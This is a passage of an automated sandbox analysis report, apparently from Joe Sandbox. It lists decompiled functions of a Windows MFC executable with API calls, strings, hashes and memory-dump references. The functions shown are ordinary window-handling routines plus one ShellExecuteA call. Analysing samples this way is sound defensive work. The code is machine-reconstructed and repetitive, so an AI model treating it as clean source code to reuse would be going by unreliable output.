#3092.MFC42(0000042D,?), ref: 0040B7CA
#6199.MFC42(0000042D,?), ref: 0040B7D1
#1779.MFC42(00000421,?,0000042D,?), ref: 0040B7E8

Part of subcall function 0040B78F: #4055.MFC42(00000421), ref: 0040B797
Part of subcall function 0040B78F: #3092.MFC42(0000042D,00000000,00000421), ref: 0040B7A4
Part of subcall function 0040B78F: #2642.MFC42(0000042D,00000000,00000421), ref: 0040B7AB

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3092$#1779#2642#4055#4710#6199
String ID:
API String ID: 2831561238-0
Opcode ID: 9c65e58852504572a41ddf233653c833b807817c32f4a004546f3fa15efb8b84
Instruction ID: 133ff4ee0b8db7c92ed3eddb83c48691acf3afbd6aeec44de40aa42a5ec0bd2c
Opcode Fuzzy Hash: 9c65e58852504572a41ddf233653c833b807817c32f4a004546f3fa15efb8b84
Instruction Fuzzy Hash: 4CE08671B407201BE9147266A892A7D22C49B89B08F00046EB582DB3C2CDAC9D0047AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABBB, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 22
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ABBB(intOrPtr _a4, char* _a8) {

				if(_a4 != 0) {
					if(strncmp(_a8, "TMsgForm", 8) != 0) {
						goto L1;
					}
					return E0040FF68(_a4, _t6, "TPanel", _t6, "TPageControlEx", _t6) & 0xffffff00 | _t8 != 0x00000000;
				}
				L1:
				return 0;
			}

0x0040abc0
0x0040abdc
0x00000000
0x00000000
0x00000000
0x0040abf9
0x0040abc2
0x00000000

APIs

strncmp.MSVCRT(?,TMsgForm,00000008), ref: 0040ABD1

Strings

TPanel, xrefs: 0040ABE5
TPageControlEx, xrefs: 0040ABDF
TMsgForm, xrefs: 0040ABC8

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: strncmp
String ID: TMsgForm$TPageControlEx$TPanel
API String ID: 1114863663-2490181851
Opcode ID: e553f4b843c57a75a6481e866a979c3a86de50d9c61a301dba9bc08c554d7d54
Instruction ID: 64844ed5746b6e88600b63c5119ad59fc614dbe5b06e82349a71975b86101572
Opcode Fuzzy Hash: e553f4b843c57a75a6481e866a979c3a86de50d9c61a301dba9bc08c554d7d54
Instruction Fuzzy Hash: 0DE086B0644301BBD5102E204D02F2B7A999F51787F00843AFD50A01D3D67DAD6C911E

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE8F, Relevance: 6.0, APIs: 4, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0041BE8F(void* __eax, void* __ecx) {
				void* _t1;
				void* _t6;

				_t1 = __eax;
				_push(0x470);
				L0043DFA6();
				_push(0x46a);
				_t6 = __eax;
				L0043DFA6();
				if(__eax == 0) {
					_t6 = 0;
				}
				_push(_t6);
				_push(0x472);
				L0043E066();
				L0043E07E();
				return _t1;
			}

0x0041be8f
0x0041be93
0x0041be98
0x0041be9d
0x0041bea4
0x0041bea6
0x0041bead
0x0041beaf
0x0041beaf
0x0041beb1
0x0041beb2
0x0041beb9
0x0041bec0
0x0041bec7

APIs

#4055.MFC42(00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?,0000046F), ref: 0041BE98
#4055.MFC42(0000046A,00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?,00000470,?), ref: 0041BEA6
#3092.MFC42(00000472,00000000,0000046A,00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?), ref: 0041BEB9
#2642.MFC42(00000472,00000000,0000046A,00000470,?,?,0041BC95,0000047C,0000047D,?,00000497,?,00000474,?,00000473,?), ref: 0041BEC0

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #4055$#2642#3092
String ID:
API String ID: 3952013578-0
Opcode ID: 2cb54ace12dfecbf32c695aba5c35e288bc8968944dd5b09ecee395656da1955
Instruction ID: bac585d85d1f5dbe8450b7088d4e2b39350a9b59ab7ac699c8f03e0361cc7c72
Opcode Fuzzy Hash: 2cb54ace12dfecbf32c695aba5c35e288bc8968944dd5b09ecee395656da1955
Instruction Fuzzy Hash: C6D0A761B4562022E93831777D1BE5F045ACBC5F78F01102FB3459B2C1EDDC8C4202AD

Uniqueness

Uniqueness Score: -1.00%

Function 004280C6, Relevance: 6.0, APIs: 4, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E004280C6(void* __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr _v4;

				_push(_a4);
				_push(0x494);
				L0043E066();
				L0043E07E();
				_push(_v4);
				_push(0x3e8);
				L0043E066();
				L0043E07E();
				return __eax;
			}

0x004280c9
0x004280cd
0x004280d2
0x004280d9
0x004280de
0x004280e4
0x004280e9
0x004280f0
0x004280f6

APIs

#3092.MFC42(00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280D2
#2642.MFC42(00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280D9
#3092.MFC42(000003E8,?,00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280E9
#2642.MFC42(000003E8,?,00000494,?,?,00427F8C,?,00000492,00000493,00000000,?), ref: 004280F0

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2642#3092
String ID:
API String ID: 2547810013-0
Opcode ID: f6507cafcd9f491414e5a13a668111bdf1f9364e3df3fff9b73c95afa83f921c
Instruction ID: 75f2788d3cc892f8fe8f43fcdb502d123ad8815563ef5ba78f98519614733e38
Opcode Fuzzy Hash: f6507cafcd9f491414e5a13a668111bdf1f9364e3df3fff9b73c95afa83f921c
Instruction Fuzzy Hash: CBD0A931702330A7EA2C33B3D90695E18A2CBC8B14F00182F32041B2E2ECF948414269

Uniqueness

Uniqueness Score: -1.00%

Function 0041F1C9, Relevance: 6.0, APIs: 4, Instructions: 15
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041F1C9(void* __ecx) {
				struct HWND__* _t3;
				int _t4;

				_t3 = GetParent( *(__ecx + 0x20));
				_push(_t3);
				L0043DD9C();
				_t4 = PostMessageA( *(_t3 + 0x20), 0x470, 0, 4);
				L0043E390();
				return _t4;
			}

0x0041f1cf
0x0041f1d5
0x0041f1d6
0x0041f1e7
0x0041f1ef
0x0041f1f5

APIs

GetParent.USER32(?), ref: 0041F1CF
#2864.MFC42(00000000), ref: 0041F1D6
PostMessageA.USER32 ref: 0041F1E7
#4976.MFC42 ref: 0041F1EF

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2864#4976MessageParentPost
String ID:
API String ID: 2938294679-0
Opcode ID: 5b96c708a9c3b30ac8aa50ef02652ca609893a0e14cf334195c577124ad5a397
Instruction ID: 2c1217a8bab253be4dc45f1c433a9b3c50de2e6f17c6b952c585fbd10f4c1097
Opcode Fuzzy Hash: 5b96c708a9c3b30ac8aa50ef02652ca609893a0e14cf334195c577124ad5a397
Instruction Fuzzy Hash: 95D0A9B2202320ABEA103730AC0AF4A3A34AB89714F02016AB345AA0F18BB428405A4C

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2AD, Relevance: 6.0, APIs: 4, Instructions: 15
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041F2AD(void* __ecx) {
				struct HWND__* _t3;
				int _t4;

				_t3 = GetParent( *(__ecx + 0x20));
				_push(_t3);
				L0043DD9C();
				_t4 = PostMessageA( *(_t3 + 0x20), 0x470, 0, 3);
				L0043E390();
				return _t4;
			}

0x0041f2b3
0x0041f2b9
0x0041f2ba
0x0041f2cb
0x0041f2d3
0x0041f2d9

APIs

GetParent.USER32(?), ref: 0041F2B3
#2864.MFC42(00000000), ref: 0041F2BA
PostMessageA.USER32 ref: 0041F2CB
#4976.MFC42 ref: 0041F2D3

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2864#4976MessageParentPost
String ID:
API String ID: 2938294679-0
Opcode ID: 517837f705007262550dc7d399950dc175bc89c4ac3d55b0685010da5d16c413
Instruction ID: 42d3c5b659a0db7424e3072eccbe8246ec77a3a44a103b73831d04e44e6851ea
Opcode Fuzzy Hash: 517837f705007262550dc7d399950dc175bc89c4ac3d55b0685010da5d16c413
Instruction Fuzzy Hash: DCD0A9B2202320ABEA113730FC0AF4A3A38AB89700F02016AB245AA0F18BA428405A4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCDC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DCDC(void* __ecx) {
				int _v8;
				int _v12;
				signed int _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v32;
				int _t16;
				int* _t24;

				_t16 =  *(__ecx + 0x488);
				if(_t16 >= 0 && _t16 <  *((intOrPtr*)(__ecx + 0x47c))) {
					_t24 =  *( *((intOrPtr*)(__ecx + 0x478)) + _t16 * 4);
					if(_t24 != 0) {
						_t16 =  *_t24;
						if(_t16 != 0) {
							_t16 = IsWindow( *(_t16 + 0x20));
							if(_t16 != 0) {
								_v16 = _v16 & 0x00000000;
								_v12 = 0;
								_v32 = 0x1c;
								_v28 = 1;
								_v24 = 0x75;
								_v8 = 0;
								return SendMessageA( *( *_t24 + 0x20), 0x53, 0,  &_v32);
							}
						}
					}
				}
				return _t16;
			}

0x0040dce2
0x0040dceb
0x0040dcfb
0x0040dd00
0x0040dd02
0x0040dd06
0x0040dd0b
0x0040dd13
0x0040dd15
0x0040dd1b
0x0040dd29
0x0040dd30
0x0040dd37
0x0040dd3e
0x00000000
0x0040dd44
0x0040dd13
0x0040dd06
0x0040dd00
0x0040dd4c

APIs

IsWindow.USER32(?), ref: 0040DD0B
SendMessageA.USER32(?,00000053,00000000,?), ref: 0040DD44

Strings

u, xrefs: 0040DD37

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: MessageSendWindow
String ID: u
API String ID: 701072176-4067256894
Opcode ID: b2528fd4eaa4c6d52b03cd6f1c48629be14ddd3c355088a85557198f9fb0599b
Instruction ID: b2284669d54d0faeb26d38785c1a03786a20e8f61ae753481eae57300a5d00e6
Opcode Fuzzy Hash: b2528fd4eaa4c6d52b03cd6f1c48629be14ddd3c355088a85557198f9fb0599b
Instruction Fuzzy Hash: 020128B1D002059FDB10CFA4C849BAA7BB4EF44308F1440BED945AF295DBB6A9068B94

Uniqueness

Uniqueness Score: -1.00%

Function 0042549E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0042549E(void* __ecx) {
				char _v264;
				void* __ebp;
				signed int _t8;

				if( *((intOrPtr*)(__ecx + 0x17f9)) != 0) {
					_t14 =  *((intOrPtr*)(__ecx + 0x60));
					if( *((intOrPtr*)(__ecx + 0x60)) != 0) {
						E0040F1E4(_t14);
					}
				}
				E0042A660( &_v264, 4, 0);
				_t8 = ShellExecuteA(0, "open",  &_v264, "nopass", 0, 0);
				_push(0x20);
				asm("sbb eax, eax");
				return  ~_t8;
			}

0x004254b0
0x004254b2
0x004254b7
0x004254b9
0x004254b9
0x004254b7
0x004254c8
0x004254e4
0x004254ea
0x004254f0
0x004254f5

APIs

ShellExecuteA.SHELL32(00000000,open,?,nopass,00000000,00000000), ref: 004254E4

Part of subcall function 0040F1E4: __EH_prolog.LIBCMT ref: 0040F1E9
Part of subcall function 0040F1E4: #535.MFC42(?), ref: 0040F210

Strings

open, xrefs: 004254DE
nopass, xrefs: 004254D8

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #535ExecuteH_prologShell
String ID: nopass$open
API String ID: 847499863-1147687034
Opcode ID: 097b36375e06f8279463bb2cbbf4181288fdb59dac216b6b3371f1c765b61e0c
Instruction ID: 69c11c08cbcb42144e18f5655e869f2158001c797cbb51c0c4bb0e3c596669fc
Opcode Fuzzy Hash: 097b36375e06f8279463bb2cbbf4181288fdb59dac216b6b3371f1c765b61e0c
Instruction Fuzzy Hash: 7AF0E5F67442183BD720BAB0ACC6FA6B29C974070DF14007EB7029A5C3E5B95D988268

Uniqueness

Uniqueness Score: -1.00%

Function 0040FF68, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FF68(struct HWND__* _a4, struct HWND__* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24) {
				struct HWND__* _t12;

				while(1) {
					_t12 = FindWindowExA(_a4, _a8, _a12, _a16);
					if(_t12 == 0) {
						break;
					}
					if(FindWindowExA(_t12, 0, _a20, _a24) != 0) {
						return _t12;
					}
					_a8 = _t12;
				}
				return 0;
			}

0x0040ff73
0x0040ff81
0x0040ff85
0x00000000
0x00000000
0x0040ff94
0x00000000
0x0040ff9b
0x0040ff96
0x0040ff96
0x00000000

APIs

FindWindowExA.USER32 ref: 0040FF7F
FindWindowExA.USER32 ref: 0040FF90

Strings

__oxFrame.class__, xrefs: 0040FF6B

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: FindWindow
String ID: __oxFrame.class__
API String ID: 134000473-3739978297
Opcode ID: 510b8760e722e30eec7a56350ee2419fc141da483daffc4cfbbf705dacfffff6
Instruction ID: bfb9782f09a1b7ea65565c282be97de465c1af69d91dd13f106d9f255517c6b2
Opcode Fuzzy Hash: 510b8760e722e30eec7a56350ee2419fc141da483daffc4cfbbf705dacfffff6
Instruction Fuzzy Hash: 77E09B3210450ABBCF124F959C00E9B3F69EBC5790F104033FA0496550D675C4226F94

Uniqueness

Uniqueness Score: -1.00%

Function 00409D3A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409D3A(struct HWND__* _a4, struct HWND__** _a8) {
				char _v36;
				void* _t9;
				struct HWND__* _t14;

				_t14 = _a4;
				GetClassNameA(_t14,  &_v36, 0x1e);
				if(strcmp( &_v36, "Internet Explorer_Server") != 0) {
					_t9 = 1;
					return _t9;
				}
				 *_a8 = _t14;
				return 0;
			}

0x00409d41
0x00409d4b
0x00409d63
0x00409d70
0x00000000
0x00409d70
0x00409d68
0x00000000

APIs

GetClassNameA.USER32(?,?,0000001E), ref: 00409D4B
strcmp.MSVCRT ref: 00409D5A

Strings

Internet Explorer_Server, xrefs: 00409D54

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
